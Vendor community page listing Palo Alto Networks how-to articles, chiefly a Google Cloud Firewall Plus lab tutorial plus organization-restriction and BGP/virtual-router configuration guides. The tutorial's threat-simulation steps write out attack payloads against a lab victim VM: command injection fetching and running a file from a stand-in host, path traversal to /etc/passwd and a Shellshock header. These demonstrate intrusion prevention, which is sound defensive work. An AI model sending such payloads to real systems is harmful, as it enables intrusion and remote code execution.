General Articles
LIVEcommunity's General Articles area is home to how-to resources, technical documentation, and discussions with Accepted Solutions that turn into articles related to all Palo Alto Networks products.
cancel
Showing results for 
Show  only  | Search instead for 
Did you mean: 
Announcements
Please sign in to see details of an important advisory in our Customer Advisories area.
About General Articles
LIVEcommunity's General Articles area is home to how-to resources, technical documentation, and discussions with Accepted Solutions that turn into articles related to all Palo Alto Networks products.
  Packet Buffer Protection is one of the first lines of defense. Find out why it's important and how it can improve your security posture.
View full article
This is a guide that shows how to deploy and use Google Cloud Firewall Plus, a native Google Cloud service powered by Palo Alto Networks Threat Prevention technologies.    Cloud Firewall is a fully distributed firewall service with advanced protection capabilities, micro-segmentation, and pervasive coverage to protect your Google Cloud workloads from internal and external threats, including: intrusion, malware, spyware, and command-and-control. The service works by creating Google-managed zonal firewall endpoints that use packet intercept technology to transparently inspect the workloads for the configured threat signatures and protect them against threats.   Diagram     ℹ️ Note Cloud Firewall Plus is currently in public preview. For the most recent version of this guide, please see the Google Cloud Firewall Plus Tutorial github repository.    Requirements Familiarize yourself with the Cloud Firewall Plus. A valid  gcloud  (SDK  447.0.0  or greater) installation or access to Google Cloud Shell. A Google Cloud project with Organizational admin access.   Topology Below is a diagram of the environment.  A VPC network contains two virtual machines ( attacker  and  victim ) that are used to simulate threats. Each virtual machine has an external address associated with its network interface to provide internet connectivity.   When Cloud Firewall Plus is enabled, Google Cloud firewall rules intercept VPC network traffic (including north-south and east-west) and redirect it to the Firewall Plus endpoint for inspection. All actions taken by the service are logged directly in the Google Cloud console for you.   Topology   Prepare for deployment Prepare for deployment by enabling the required APIs, retrieving the deployment files, and configuring the environment variables. 1. Open Google Cloud Shell and enable the required APIs. gcloud services enable compute.googleapis.com gcloud services enable networksecurity.googleapis.com   2. List your Organization ID(s). gcloud organizations list   3. Set the desired Organization ID to the environment variable  ORG_ID . export ORG_ID=ORGANIZATION_ID   4. List your projects within the organization. gcloud alpha projects list --organization=$ORG_ID   5. Set the desired Project ID to the environment variable PROJECT_ID . export PROJECT_ID=PROJECT_ID   6. Set your Project ID to your gcloud configuration. gcloud config set project $PROJECT_ID   7. Set values for the deployment's REGION ,  ZONE , and naming  PREFIX . export REGION=us-central1 export ZONE=us-central1-a export PREFIX=panw   8. Select a deployment option.  Both options deploy identical environments.  Scripted Deployment All of the cloud resources required for the tutorial are deployed using a single script. Best for users who are familiar with Cloud Firewall Plus and want to quickly test use-cases. Step-by-step Deployment Each cloud resource is deployed individually through  gcloud . Best for users who are new to Cloud Firewall Plus or want control over which resources are deployed.   Scripted Deployment   1. In Cloud Shell, clone the repository and change directories. git clone https://github.com/PaloAltoNetworks/google-cloud-firewall-plus-tutorial cd google-cloud-firewall-plus-tutorial   2. Execute the script to create the environment. ./ips_create.sh   3. When the script completes, proceed to Simulate Threats.   Step-by-Step Deployment   1. In Cloud Shell, create a VPC network, subnetwork, and firewall rule to allow ingress traffic. gcloud compute networks create $PREFIX-vpc \ --subnet-mode=custom \ --project=$PROJECT_ID gcloud compute networks subnets create $PREFIX-subnet \ --network=$PREFIX-vpc \ --range=10.0.0.0/24 \ --region=$REGION \ --project=$PROJECT_ID gcloud compute firewall-rules create $PREFIX-all-ingress \ --network=$PREFIX-vpc \ --direction=ingress \ --allow=all \ --source-ranges=0.0.0.0/0 \ --project=$PROJECT_ID   2. Create two virtual machines ( attacker  &  victim ).  The machines will be used to simulate sudo-threats later. gcloud compute instances create $PREFIX-attacker \ --zone=$ZONE \ --machine-type=f1-micro \ --image-project=ubuntu-os-cloud \ --image-family=ubuntu-2004-lts \ --network-interface subnet=$PREFIX-subnet,private-network-ip=10.0.0.10 \ --project=$PROJECT_ID gcloud compute instances create $PREFIX-victim \ --zone=$ZONE\ --machine-type=f1-micro \ --image-project=panw-gcp-team-testing \ --image=debian-cloud-ids-victim \ --network-interface subnet=$PREFIX-subnet,private-network-ip=10.0.0.20 \ --project=$PROJECT_ID   3. Create a security profile and a security profile group. gcloud beta network-security security-profiles threat-prevention create $PREFIX-profile \ --location=global \ --project=$PROJECT_ID \ --organization=$ORG_ID \ --quiet gcloud beta network-security security-profile-groups create $PREFIX-profile-group \ --threat-prevention-profile "organizations/$ORG_ID/locations/global/securityProfiles/$PREFIX-profile" \ --location=global \ --project=$PROJECT_ID \ --organization=$ORG_ID \ --quiet   4. Set the security profile's action to  ALERT  for threat severities categorized as  INFORMATIONAL  and  LOW , while setting it to  BLOCK  for those categorized as  MEDIUM ,  HIGH , and  CRITICAL . gcloud beta network-security security-profiles threat-prevention add-override $PREFIX-profile \ --severities=INFORMATIONAL,LOW \ --action=ALERT \ --location=global \ --organization=$ORG_ID \ --project=$PROJECT_ID gcloud beta network-security security-profiles threat-prevention add-override $PREFIX-profile \ --severities=MEDIUM,HIGH,CRITICAL \ --action=DENY \ --location=global \ --organization=$ORG_ID \ --project=$PROJECT_ID   5. Create a Firewall Plus Endpoint.  The endpoint can take up to 25 minutes to fully provision.  gcloud beta network-security firewall-endpoints create $PREFIX-endpoint \ --zone=$ZONE \ --project=$PROJECT_ID \ --organization=$ORG_ID \ --quiet while true; do STATUS_EP=$(gcloud beta network-security firewall-endpoints describe $PREFIX-endpoint \ --zone=$ZONE \ --project=$PROJECT_ID \ --organization=$ORG_ID \ --format="json" | jq -r '.state') if [[ "$STATUS_EP" == "ACTIVE" ]]; then echo "Firewall endpoint $PREFIX-endpoint is now active." sleep 2 break fi echo "Waiting for the firewall endpoint to be created. This can take up to 25 minutes..." sleep 5 done   6. Associate the endpoint with a VPC network.  The association can take up to 30 minutes to complete. gcloud beta network-security firewall-endpoint-associations create $PREFIX-assoc \ --endpoint "organizations/$ORG_ID/locations/$ZONE/firewallEndpoints/$PREFIX-endpoint" \ --network=$PREFIX-vpc \ --zone=$ZONE \ --project=$PROJECT_ID \ --quiet while true; do STATUS_ASSOC=$(gcloud beta network-security firewall-endpoint-associations describe $PREFIX-assoc \ --zone=$ZONE \ --project=$PROJECT_ID \ --format="json" | jq -r '.state') if [[ "$STATUS_ASSOC" == "ACTIVE" ]]; then echo "Endpoint association $PREFIX-assoc is now active." sleep 2 break fi echo "Waiting for the endpoint association to be created. This can take up to 45 minutes..." sleep 1 done   7. Create a Network Firewall Policy with two firewall rules to allow all ingress & egress traffic to the workload network.  gcloud compute network-firewall-policies create $PREFIX-global-policy \ --global \ --project=$PROJECT_ID gcloud compute network-firewall-policies rules create 10 \ --action=allow \ --firewall-policy=$PREFIX-global-policy \ --global-firewall-policy \ --direction=INGRESS \ --enable-logging \ --layer4-configs all \ --src-ip-ranges=0.0.0.0/0 \ --dest-ip-ranges=0.0.0.0/0\ --project=$PROJECT_ID gcloud compute network-firewall-policies rules create 11 \ --action=allow \ --firewall-policy=$PREFIX-global-policy \ --global-firewall-policy \ --layer4-configs=all \ --direction=EGRESS \ --enable-logging \ --src-ip-ranges=0.0.0.0/0 \ --dest-ip-ranges=0.0.0.0/0 \ --project=$PROJECT_ID   8. Associate the Network Firewall Policy with the VPC network created previously.  gcloud compute network-firewall-policies associations create \ --firewall-policy=$PREFIX-global-policy \ --network=$PREFIX-vpc \ --name=$PREFIX-global-policy-association \ --global-firewall-policy   9. (Optional) Review the created resources. Firewall Endpoint Firewall Endpoint VPC Network Association Security Profile Network Firewall Policy   Simulate threats without Cloud Firewall Plus Simulate several threats between the  attacker  and  victim  virtual machines without Cloud Firewall Plus inspection. Deep packet inspection does not occur because the firewall policies created in the previous step do not intercept traffic for inspection by the Firewall Plus endpoint.   Without inspection   1. In Cloud Shell, open an SSH session to the  attacker  VM. gcloud compute ssh paloalto@$PREFIX-attacker --zone=$ZONE --project=$PROJECT_ID   2. From the  attacker  VM, simulate sudo-threats to the  victim ( 10.0.0.20 ) VM. curl "http://10.0.0.20/weblogin.cgi?username=admin';cd /tmp;wget http://123.123.123.123/evil;sh evil;rm evil" curl http://10.0.0.20/?item=../../../../WINNT/win.ini -m 5 curl http://10.0.0.20/cgi-bin/../../../..//bin/cat%20/etc/passwd -m 5 curl -H 'User-Agent: () { :; }; 123.123.123.123:9999' -m 5 http://10.0.0.20/cgi-bin/test-critical -m 5   3. Attempt to download a sudo-malicious file from the internet. wget www.eicar.org/download/eicar.com.txt --tries 1 --timeout 2   💡 Objective The above threat simulations should be successful. This is because the Firewall Endpoint is not inspecting the traffic between the  attacker  and  victim  virtual machines.   Prevent threats with Cloud Firewall Plus Cloud Firewall Plus uses Google Cloud's packet intercept technology to transparently redirect traffic from workloads to firewall endpoints. Traffic redirection is defined within network firewall rules that reference the security profile group.   Update network firewall policies Update the network firewall policies to redirect traffic to the firewall endpoint.  The action defined in the firewall rule determines which security profile group is applied to the traffic.    With inspection via Traffic Intercept   1. Modify the ingress & egress firewall rules within the global network policy to intercept traffic to the Firewall Plus endpoint. gcloud beta compute network-firewall-policies rules update 10 \ --action=apply_security_profile_group \ --firewall-policy=$PREFIX-global-policy \ --global-firewall-policy \ --project=$PROJECT_ID \ --security-profile-group=//networksecurity.googleapis.com/organizations/$ORG_ID/locations/global/securityProfileGroups/$PREFIX-profile-group gcloud beta compute network-firewall-policies rules update 11 \ --action=apply_security_profile_group \ --firewall-policy=$PREFIX-global-policy \ --global-firewall-policy \ --project=$PROJECT_ID \ --security-profile-group=//networksecurity.googleapis.com/organizations/$ORG_ID/locations/global/securityProfileGroups/$PREFIX-profile-group   Replay threats Rerun the previous threats again to see the actions taken by Cloud Firewall Plus.   1. In Cloud Shell, open an SSH session to the  attacker  VM. gcloud compute ssh paloalto@$PREFIX-attacker --zone=$ZONE --project=$PROJECT_ID   2. From the  attacker  VM, simulate sudo-threats to the  victim ( 10.0.0.20 ) VM. curl "http://10.0.0.20/weblogin.cgi?username=admin';cd /tmp;wget http://123.123.123.123/evil;sh evil;rm evil" curl http://10.0.0.20/?item=../../../../WINNT/win.ini -m 5 curl http://10.0.0.20/cgi-bin/../../../..//bin/cat%20/etc/passwd -m 5 curl -H 'User-Agent: () { :; }; 123.123.123.123:9999' -m 5 http://10.0.0.20/cgi-bin/test-critical -m 5   3. Attempt to download a sudo-malicious file from the internet. wget www.eicar.org/download/eicar.com.txt --tries 1 --timeout 2   💡 Objective The simulated threats from the  attacker  should fail. This is because the Firewall Plus service is preventing the exploits from reaching the  victim  machine.   View threats All of the actions taken by Cloud Firewall Plus are logged directly to the Google Cloud console for you.  These logs can be forwarded to Cortex XSIAM for further forensic investigation and action.   1. In the Google Cloud console, go to Network Security → Threats.   Cloud logs   💡 Objective You should see the actions taken by the Firewall Plus endpoint, indicating the service has detected and/or stopped the simulated threats.  The action taken against a threat is determined by the security profile group applied to the network firewall rule.   Clean up To delete the created resources, delete your Google Cloud deployment project. If you cannot delete your deployment project, follow the steps below to delete the resources created in this tutorial.   1. If you chose the Step-by-Step Deployment, clone the repository to Cloud Shell.  git clone https://github.com/PaloAltoNetworks/google-cloud-firewall-plus-tutorial cd google-cloud-firewall-plus-tutorial    2. Execute the script to delete the created resources. ./ips_delete   More Information Please see the materials below for more information about the topics discussed in this tutorial. Announcement Palo Alto Networks with Google Cloud Firewall Palo Alto Networks with Google Cloud Cloud Firewall Plus Overview Configure Intrusion Prevention Service
View full article
This Nominated Discussion Article is based on the post "Migrating PA-5050 to PA-5410".
View full article
In this article, we will look at how to identify the VM-Series versions based on the PAN-OS version and licensing model, how to deploy a specific version of VM-Series and then also how we can deploy the same through automation.  
View full article
Palo Alto Networks' Commit and Config Locks are important features that help ensure the integrity of network configurations and prevent unauthorized changes.
View full article
    Introduction Security administrators can use Google Cloud IAM to control who can access resources within a Google Cloud organization.  However, companies  may require the ability to restrict access to resources and APIs that reside in different Google Cloud organizations.  The combination of Palo Alto Networks URL filtering and Google Cloud organization restrictions, enables security teams to restrict employee access to sanctioned Google Cloud organizations.  The capability provides a variety of security benefits including, preventing insider attacks and also stopping data exfiltration.    Use-Cases There are many use-cases for organization restrictions, for example:    In combination with Palo Alto Networks URL Filtering, you can monitor and control sites users can access, prevent phishing attacks by controlling the sites to which users can submit valid corporate credentials, and enforce safe search for search engines like Google. You can restrict access so employees can only access resources in your Google Cloud organization and not other organizations. You can allow your employees read-only access to any Cloud Storage resources, but restrict all other types of access to only resources in your Google Cloud Organization. You can allow your employees to access a vendor Google Cloud organization in addition to your Google Cloud organization.   How it works The diagram below shows the required components to enforce organization restrictions.  When a managed device accesses a Google Cloud resource, the URL Filtering profile defined within the security policy, inserts the value for the organization restrictions header,  X-Goog-Allowed-Resources .      Managed device: Any device that adheres to the organizational policies of the company and is connected to, or routed through, a Palo Alto Networks enforcement point with URL Filtering enabled.  For example, the managed device can be a remote user connected with GlobalProtect, a datacenter server protected by a PA-Series NGFW, or cloud resources protected by VM-Series NGFW.  Palo Alto Networks URL Filtering: A URL Filtering profile is created and attached to the security policy.  The profile inserts the organization restriction as a custom header for any requests originating from the managed device.  This configuration prevents users and devices from accessing any Google Cloud resources that reside in unsanctioned Google Cloud organizations.   Google Cloud: The organization restrictions feature in Google Cloud inspects all requests for organization restrictions header, and allows or denies the requests based on the organization being accessed.   Example Scenario The network security administrator of Organization A , wants to allow employee access to resources hosted in their Google Cloud organization.  All employee access to cloud resources hosted in all other Google Cloud organizations should be denied.    Configuration A cloud and network security administrator for Organization A perform the following steps to implement organization restrictions.   Retrieve the Google Cloud organization ID for Organization A . gcloud organizations list (output) DISPLAY_NAME: Organization A ID: 0123456 DIRECTORY_CUSTOMER_ID: a1b2c3d4 Create a JSON representation for the value that will be assigned to the organization restriction header,  X-Goog-Allowed-Resources , and save it to a file named authorized_orgs.json .  Please see configure organization restrictions for complete information on constructing the value for the header. { "resources": ["organizations/0123456"], "options": "strict" } Encode the header value in base64 format.  Below is an example using  basenc.   The URL Filtering profile will insert the base64 string as the value for the X-Goog-Allowed-Resources header. cat authorized_orgs.json | basenc --base64url -w0 (output) fdsasdfInJlc291cmNlasjdfaJnYW5pemF0ay8xMjM0NTY3ODkiXSwKICJvcHRpb25zIjogInN0cmljdCIKfQo​ If there are no upstream devices decrypting HTTPS traffic, configure SSL Forward Proxy.  On the Palo Alto Networks device, edit or create a URL Filtering profile.  In the profile, click HTTP Header Insertion → Add to create a new entry.  Configure the entry as follows: Header: X-Goog-Allowed-Resources Value: Add the base64 encoded value from the previous step. Apply the URL Filtering profile to your security policy that inspects the managed device’s internet traffic. Commit the changes. Verify Configuration The organization restrictions are applied for access to the Google Cloud APIs and Google Cloud console. On a managed device that has access to both Organization A and Organization B , perform the following to test the organization restrictions feature.    On the managed device, log into the Google Cloud Console with an account that has access to Organization A and Organization B . In the Console, click the Organization drop down menu.     Even though the user account on the managed device has access to Organization A and Organization B , only Organization A appears in the Google Cloud Console.  This is because the URL Filtering profile inserts the organization restriction header to enable Google Cloud to block the user from accessing other organizations. From the same managed device, attempt to reach the logging API of a Google Project (i.e. org-a-project ) that belongs to Organization A .   The request should show a successful return of the log entries within the Google Cloud project belonging to Organization A . TOKEN=$(gcloud auth print-access-token) curl -X POST -d '{"projectIds": ["org-a-project"]}' -H 'Content-Type: application/json' -H "Authorization: Bearer ${TOKEN}" "https://logging.googleapis.com/v2/entries:list" (output) { [ <..redacted..> ] nextPageToken": "EAB<..redacted..>RsAB" } Attempt to reach the logging API of a Google Cloud project (i.e. org-b-project) that does not belong to Organization A .   The request should show a failed return to the Google Cloud project that does not belong to Organization A .  This is because the URL filtering profile inserted the organization restriction header into the request of the managed device. curl -X POST -d '{"projectIds": ["org-b-project"]}' -H 'Content-Type: application/json' -H "Authorization: Bearer ${TOKEN}" "https://logging.googleapis.com/v2/entries:list" (output) { "error": { "code": 403, "message": "Access denied by organization restriction. Please contact your administrator for additional information.", "status": "PERMISSION_DENIED", "details": [{ "@type": "type.googleapis.com/google.rpc.ErrorInfo", "reason": "ORG_RESTRICTION_VIOLATION", "domain": "googleapis.com", "metadata": { "consumer": "projects/01234567890", "service": "logging.googleapis.com" } }] } }   Additional Materials Google Cloud: Introduction to organization restrictions Google Cloud: Configure organization restrictions Palo Alto Networks: HTTP Header Insertion Palo Alto Networks: Create Custom HTTP Header Insertion Entries
View full article
This Nominated Discussion Article is based on the post "CLI configuration of adding interface to virtual router" by @nowayout and responded to by @aleksandar.astardzhiev  . Read on to see the discussion and solution!   When adding an interface into VR using CLI, do I need to copy all the existing interfaces currently in the VR and then add this new interface into the list ?   For example, current default virtual router has two interface ethernet1/1 and ethernet1/2, I want to add another interface ethernet1/3 what I need to do is only "set network virtual-router default interface [ ethernet1/3 ]" or I have to do "set network virtual-router default interface [ ethernet1/1 ethernet1/2 ethernet1/3] If the latter one, it'll involve some programming work if doing automation in real world environment as we don't know what interfaces already in the virtual router, so need to get the list first and then add the interface into the list and issue the set command.   You don't need to list existing interfaces when adding new one to virtual-router. If you run the following command it will add to the existing list, and will not override it:   > set network virtual-router default interface ethernet1/3   The square brackets are options in your case, they are needed if you want to add multiple interfaces with single command.   Even if you are adding multiple interfaces with [ ethernet1/4 ethernet1/5 ethernet1/6 ], it will still only add those three without overriding or removing any interface from the list.   Now if you want to remove interface/s from the list you either remove interface one by one or all interfaces at once:   # will remove only one interface from the list and the rest will remain > delete network virtual-router default interface ethernet1/3 # will remove all interface from virtual router > delete network virtual-router default interface  
View full article
This Nominated Discussion Article is based on the post "What happens when a base image is deleted from PAN OS".
View full article
Real-time retrieval of WildFire signatures, WildFire Inline ML and Advanced Wildfire that are available for Palo Alto NGFW and Prisma Access SASE.
View full article
The Palo Alto NGFW is a really stable device but sometimes there is a need to restart a process as a workaround for a bug causing high CPU or Memory leakage. How can we automate this process? 
View full article
This article is based on a discussion, "How to implement BGP and eBGP on Palo". Read on to see @rkvsenthil's guidance on configuring BGP below.   Hi, I am migrating WatchGuard to Palo and there seems to be a lot more configuration options on the Palo.    WatchGuard configuration is below. What is the best way to configure this within Palo? Where is the option to set default-originate?   router bgp 64801 bgp router-id 169.254.3.3 timers bgp 4 12 neighbor 10.200.34.2 remote-as 64601 neighbor 10.200.34.3 remote-as 64601 neighbor 10.200.52.2 remote-as 64601 neighbor 10.200.52.3 remote-as 64601 neighbor 10.200.64.130 remote-as 64601 neighbor 10.200.64.131 remote-as 64601 neighbor 10.200.34.2 default-originate neighbor 10.200.34.3 default-originate neighbor 10.200.52.2 default-originate neighbor 10.200.52.3 default-originate neighbor 10.200.64.130 default-originate neighbor 10.200.64.131 default-originate neighbor 10.200.34.2 ebgp-multihop 4 neighbor 10.200.34.3 ebgp-multihop 4 neighbor 10.200.52.2 ebgp-multihop 4 neighbor 10.200.52.3 ebgp-multihop 4 neighbor 10.200.64.130 ebgp-multihop 4 neighbor 10.200.64.131 ebgp-multihop 4   BGP Config template:   For default-originate -- In GUI,, go to Network -- Virtual Router --  <VR name or default> --- BGP --- Redist Rule and  add a Redistribution rule for ip subnet 0.0.0.0/0 and enable "Allow Redistribute Default route" option ..   Also,, use the below config example as template. This should give you clues on how and where, you can change the timer settings and TTL value (ebgp-multihop), etc..   admin@PAFW1> configure set network virtual-router default protocol bgp enable yes set network virtual-router default protocol bgp routing-options graceful-restart enable yes set network virtual-router default protocol bgp peer-group stub_ebgp_peers type ebgp remove-private-as no set network virtual-router default protocol bgp peer-group stub_ebgp_peers type ebgp import-nexthop original set network virtual-router default protocol bgp peer-group stub_ebgp_peers type ebgp export-nexthop resolve set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 peer-address ip 10.0.18.2 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 connection-options incoming-bgp-connection remote-port 0 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 connection-options incoming-bgp-connection allow yes set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 connection-options outgoing-bgp-connection local-port 0 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 connection-options outgoing-bgp-connection allow yes set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 connection-options multihop 0 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 connection-options keep-alive-interval 30 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 connection-options open-delay-time 0 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 connection-options hold-time 90 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 connection-options idle-hold-time 15 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 connection-options min-route-adv-interval 30 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 subsequent-address-family-identifier unicast yes set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 subsequent-address-family-identifier multicast no set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 local-address ip 10.0.18.1/30 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 local-address interface ethernet1/1 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 bfd profile Inherit-vr-global-setting set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 max-prefixes 5000 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 enable yes set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 peer-as 64513 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 enable-mp-bgp no set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 address-family-identifier ipv4 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 enable-sender-side-loop-detection no set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 reflector-client non-client set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer upstream_R5 peering-type unspecified set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 peer-address ip 100.100.100.1 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 connection-options incoming-bgp-connection remote-port 0 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 connection-options incoming-bgp-connection allow yes set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 connection-options outgoing-bgp-connection local-port 0 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 connection-options outgoing-bgp-connection allow yes set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 connection-options multihop 4 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 connection-options keep-alive-interval 30 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 connection-options open-delay-time 0 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 connection-options hold-time 90 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 connection-options idle-hold-time 15 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 connection-options min-route-adv-interval 30 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 subsequent-address-family-identifier unicast yes set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 subsequent-address-family-identifier multicast no set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 local-address ip 192.168.102.2/30 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 local-address interface ethernet1/2 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 bfd profile Inherit-vr-global-setting set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 max-prefixes 5000 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 enable yes set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 peer-as 64512 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 enable-mp-bgp no set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 address-family-identifier ipv4 set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 enable-sender-side-loop-detection no set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 reflector-client non-client set network virtual-router default protocol bgp peer-group stub_ebgp_peers peer inside_core_2 peering-type bilateral set network virtual-router default protocol bgp peer-group stub_ebgp_peers aggregated-confed-as-path yes set network virtual-router default protocol bgp peer-group stub_ebgp_peers soft-reset-with-stored-info yes set network virtual-router default protocol bgp peer-group stub_ebgp_peers enable yes set network virtual-router default protocol bgp reject-default-route no set network virtual-router default protocol bgp allow-redist-default-route yes set network virtual-router default protocol bgp router-id 192.168.102.2 set network virtual-router default protocol bgp local-as 65535 set network virtual-router default protocol bgp redist-rules 0.0.0.0/0 address-family-identifier ipv4 set network virtual-router default protocol bgp redist-rules 0.0.0.0/0 enable yes set network virtual-router default protocol bgp redist-rules 0.0.0.0/0 set-origin incomplete set network virtual-router default protocol bgp policy export rules default-route-only action allow update as-path none set network virtual-router default protocol bgp policy export rules default-route-only action allow update origin incomplete set network virtual-router default protocol bgp policy export rules default-route-only action allow update community none set network virtual-router default protocol bgp policy export rules default-route-only action allow update extended-community none set network virtual-router default protocol bgp policy export rules default-route-only match address-prefix 0.0.0.0/0 exact no set network virtual-router default protocol bgp policy export rules default-route-only match route-table unicast set network virtual-router default protocol bgp policy export rules default-route-only used-by stub_ebgp_peers set network virtual-router default protocol bgp policy export rules default-route-only enable yes [edit] admin@PAFW1# commit Commit job 6 is in progress. Use Ctrl+C to return to command prompt ..........100% Configuration committed successfully [edit] admin@PAFW1# run show routing protocol bgp rib-out VIRTUAL ROUTER: default (id 1) ========== Prefix Nexthop Peer Originator Adv Status Aggr Status AS-Path 0.0.0.0/0 10.0.18.1 upstream_R5 0.0.0.0 advertised no aggregation 65535 192.168.100.0/30 10.0.18.1 upstream_R5 0.0.0.0 advertised no aggregation 65535,64512 192.168.101.0/30 10.0.18.1 upstream_R5 0.0.0.0 advertised no aggregation 65535,64512 0.0.0.0/0 192.168.102.2 inside_core_2 0.0.0.0 advertised no aggregation 65535 5.5.5.5/32 192.168.102.2 inside_core_2 0.0.0.0 advertised no aggregation 65535,64513 total routes shown: 5 [edit] admin@PAFW1# set network virtual-router default protocol bgp policy export rules default-route-only match address-prefix 0.0.0.0/0 exact yes [edit] admin@PAFW1# commit Commit job 6 is in progress. Use Ctrl+C to return to command prompt ..........100% Configuration committed successfully [edit] admin@PAFW1# run show routing protocol bgp rib-out VIRTUAL ROUTER: default (id 1) ========== Prefix Nexthop Peer Originator Adv Status Aggr Status AS-Path 0.0.0.0/0 10.0.18.1 upstream_R5 0.0.0.0 advertised no aggregation 65535 0.0.0.0/0 192.168.102.2 inside_core_2 0.0.0.0 advertised no aggregation 65535 total routes shown: 2       If you need the BGP learned best routes to be installed in the routing table, add this from CLI.   [edit] admin@PAFW1# set network virtual-router default protocol bgp install-route yes [edit] admin@PAFW1#commit [edit] admin@PAFW1# run show routing route type bgp    
View full article
Learn best practices and recommendations for securing Palo Alto Networks Panorama and Log Collector communications.   Learn best practices and recommendations for securing Palo Alto Networks Panorama and Log Collector communications.
View full article
This article is based on a Palo Alto Networks LIVEcommunity discussion, WildFire analysis report rabbit images, posted by @CHOE-KyungJun and answered by @Adrian_Jensen. 
View full article
SASE (pronounced sassy) is the convergence of different access and network security methods into one cohesive platform.
View full article
  • 181 Posts
  • 257 Subscriptions
Customer Advisories

Your security posture is important to us. If you’re a Palo Alto Networks customer, be sure to login to see the latest critical announcements and updates in our Customer Advisories area.

Learn how to subscribe to and receive email notifications here.

Listen to PANCast

PANCast is a Palo Alto Networks podcast that provides actionable insights to customers, helping you maximize your investment while improving your cybersecurity posture.

Labels
Top Contributors
Top Liked Posts in LIVEcommunity Article
Top Liked Authors